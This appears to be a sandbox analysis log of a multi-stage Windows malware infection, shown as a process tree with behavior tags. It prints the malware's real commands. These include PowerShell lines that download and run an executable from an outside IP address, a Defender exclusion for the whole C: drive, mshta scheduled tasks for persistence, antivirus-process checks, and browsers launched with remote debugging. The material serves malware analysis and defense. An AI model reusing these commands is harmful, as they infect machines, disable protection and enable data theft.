C:\Users\Admin\AppData\Local\Temp\10369110101\Rm3cVPI.exe"C:\Users\Admin\AppData\Local\Temp\10369110101\Rm3cVPI.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4396
-
-
C:\Users\Admin\AppData\Local\Temp\10369120101\c606d285b9.exe"C:\Users\Admin\AppData\Local\Temp\10369120101\c606d285b9.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5096
-
-
C:\Users\Admin\AppData\Local\Temp\10369130101\TbV75ZR.exe"C:\Users\Admin\AppData\Local\Temp\10369130101\TbV75ZR.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2816 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:4072
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2432 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2432 -s 4968⤵
- Program crash
PID:5704
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10369140101\hYjiwV0.exe"C:\Users\Admin\AppData\Local\Temp\10369140101\hYjiwV0.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4772 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:5176
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:3648 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"8⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5104 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff7a88dcf8,0x7fff7a88dd04,0x7fff7a88dd109⤵PID:3092
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1976,i,7502695231349649498,6031798680987563372,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=1972 /prefetch:29⤵PID:1900
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1572,i,7502695231349649498,6031798680987563372,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2268 /prefetch:39⤵PID:3860
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2384,i,7502695231349649498,6031798680987563372,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2556 /prefetch:89⤵PID:2196
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3136,i,7502695231349649498,6031798680987563372,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3164 /prefetch:19⤵
- Uses browser remote debugging
PID:4720
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3144,i,7502695231349649498,6031798680987563372,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3208 /prefetch:19⤵
- Uses browser remote debugging
PID:1760
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4196,i,7502695231349649498,6031798680987563372,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4240 /prefetch:29⤵
- Uses browser remote debugging
PID:4024
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4628,i,7502695231349649498,6031798680987563372,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4700 /prefetch:19⤵
- Uses browser remote debugging
PID:6132
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4620,i,7502695231349649498,6031798680987563372,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4876 /prefetch:89⤵PID:1032
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5492,i,7502695231349649498,6031798680987563372,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5504 /prefetch:89⤵PID:3232
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5608,i,7502695231349649498,6031798680987563372,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5616 /prefetch:89⤵PID:3440
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5596,i,7502695231349649498,6031798680987563372,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5192 /prefetch:89⤵PID:4864
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5504,i,7502695231349649498,6031798680987563372,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5616 /prefetch:89⤵PID:3000
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5684,i,7502695231349649498,6031798680987563372,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5712 /prefetch:89⤵PID:6084
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"8⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:5864 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x24c,0x7fff7a0ef208,0x7fff7a0ef214,0x7fff7a0ef2209⤵PID:5932
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2208,i,11126925008465705555,11895834331219258330,262144 --variations-seed-version --mojo-platform-channel-handle=2096 /prefetch:29⤵PID:5256
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1952,i,11126925008465705555,11895834331219258330,262144 --variations-seed-version --mojo-platform-channel-handle=2280 /prefetch:39⤵PID:5784
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2464,i,11126925008465705555,11895834331219258330,262144 --variations-seed-version --mojo-platform-channel-handle=2712 /prefetch:89⤵PID:2564
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3552,i,11126925008465705555,11895834331219258330,262144 --variations-seed-version --mojo-platform-channel-handle=3644 /prefetch:19⤵
- Uses browser remote debugging
PID:6104
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3560,i,11126925008465705555,11895834331219258330,262144 --variations-seed-version --mojo-platform-channel-handle=3720 /prefetch:19⤵
- Uses browser remote debugging
PID:440
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\9r1ng" & exit8⤵
- System Location Discovery: System Language Discovery
PID:8844 -
C:\Windows\SysWOW64\timeout.exetimeout /t 119⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:8932
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10369150101\EPTwCQd.exe"C:\Users\Admin\AppData\Local\Temp\10369150101\EPTwCQd.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2904 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- Suspicious behavior: EnumeratesProcesses
PID:5900
-
-
-
C:\Users\Admin\AppData\Local\Temp\10369160101\7IIl2eE.exe"C:\Users\Admin\AppData\Local\Temp\10369160101\7IIl2eE.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:1000 -
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat7⤵
- System Location Discovery: System Language Discovery
PID:6024 -
C:\Windows\SysWOW64\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4748
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"8⤵
- System Location Discovery: System Language Discovery
PID:5268
-
-
C:\Windows\SysWOW64\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1708
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"8⤵
- System Location Discovery: System Language Discovery
PID:3452
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 4183778⤵
- System Location Discovery: System Language Discovery
PID:5024
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Leon.cab8⤵
- System Location Discovery: System Language Discovery
PID:5916
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "BEVERAGES" Compilation8⤵
- System Location Discovery: System Language Discovery
PID:2988
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com8⤵
- System Location Discovery: System Language Discovery
PID:3172
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N8⤵
- System Location Discovery: System Language Discovery
PID:3316
-
-
C:\Users\Admin\AppData\Local\Temp\418377\Passwords.comPasswords.com N8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4856
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 58⤵
- System Location Discovery: System Language Discovery
PID:5284
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10369170101\u75a1_003.exe"C:\Users\Admin\AppData\Local\Temp\10369170101\u75a1_003.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: MapViewOfSection
PID:5008 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'7⤵PID:2216
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5580
-
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"7⤵
- Downloads MZ/PE file
- Adds Run key to start application
PID:4904 -
C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe"C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""8⤵
- Executes dropped EXE
PID:5312
-
-
C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe"C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""8⤵
- Deletes itself
- Executes dropped EXE
PID:3632 -
C:\Users\Admin\AppData\Local\Temp\{e17b978d-28ea-44b3-bdc7-a6c6c6c0e114}\b2e2ac1.exe"C:\Users\Admin\AppData\Local\Temp\{e17b978d-28ea-44b3-bdc7-a6c6c6c0e114}\b2e2ac1.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot9⤵
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
- System Location Discovery: System Language Discovery
PID:10984 -
C:\Users\Admin\AppData\Local\Temp\{dbcc2bd4-9819-4356-96dd-348868c0c2ff}\46e716e8.exeC:/Users/Admin/AppData/Local/Temp/{dbcc2bd4-9819-4356-96dd-348868c0c2ff}/\46e716e8.exe -accepteula -adinsilent -silent -processlevel 2 -postboot10⤵
- Drops file in Drivers directory
- Sets service image path in registry
- Executes dropped EXE
- Impair Defenses: Safe Mode Boot
- Loads dropped DLL
- Adds Run key to start application
- Enumerates connected drives
- Writes to the Master Boot Record (MBR)
- Checks for VirtualBox DLLs, possible anti-VM trick
- System Location Discovery: System Language Discovery
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:11784
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10369180101\62b36023a0.exe"C:\Users\Admin\AppData\Local\Temp\10369180101\62b36023a0.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5724 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn loCMOmaONKB /tr "mshta C:\Users\Admin\AppData\Local\Temp\rCKdsa4JY.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
PID:4072 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn loCMOmaONKB /tr "mshta C:\Users\Admin\AppData\Local\Temp\rCKdsa4JY.hta" /sc minute /mo 25 /ru "Admin" /f8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:12788
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\rCKdsa4JY.hta7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:3924 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ETFFIRZNMFMBR1CERXWT5MBORYKTYXSS.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5824 -
C:\Users\Admin\AppData\Local\TempETFFIRZNMFMBR1CERXWT5MBORYKTYXSS.EXE"C:\Users\Admin\AppData\Local\TempETFFIRZNMFMBR1CERXWT5MBORYKTYXSS.EXE"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:7420
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10369190121\am_no.cmd" "6⤵
- System Location Discovery: System Language Discovery
PID:13104 -
C:\Windows\SysWOW64\timeout.exetimeout /t 27⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:13148
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:13252 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:13268
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:7012 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:7056
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:2540 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6072
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "mFRT3maNjF7" /tr "mshta \"C:\Temp\jGzWfJYVb.hta\"" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4764
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\jGzWfJYVb.hta"7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:5744 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1676 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:7476
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10369200101\627d431241.exe"C:\Users\Admin\AppData\Local\Temp\10369200101\627d431241.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6168 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
PID:5204
-
-
-
C:\Users\Admin\AppData\Local\Temp\10369210101\02a203a317.exe"C:\Users\Admin\AppData\Local\Temp\10369210101\02a203a317.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:9172
-
-
C:\Users\Admin\AppData\Local\Temp\10369220101\cdf48d376b.exe"C:\Users\Admin\AppData\Local\Temp\10369220101\cdf48d376b.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:10056
-
-
C:\Users\Admin\AppData\Local\Temp\10369230101\e6e32e2403.exe"C:\Users\Admin\AppData\Local\Temp\10369230101\e6e32e2403.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:10612 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""7⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:12256 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff7be8dcf8,0x7fff7be8dd04,0x7fff7be8dd108⤵PID:6740
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2020,i,10604927250952469054,15017875049220995457,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=1904 /prefetch:28⤵PID:12468
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2112,i,10604927250952469054,15017875049220995457,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2248 /prefetch:38⤵PID:12484
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2384,i,10604927250952469054,15017875049220995457,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2400 /prefetch:88⤵PID:5692
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3240,i,10604927250952469054,15017875049220995457,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3252 /prefetch:18⤵
- Uses browser remote debugging
PID:7288
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3536,i,10604927250952469054,15017875049220995457,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3552 /prefetch:18⤵
- Uses browser remote debugging
PID:7328
-
-
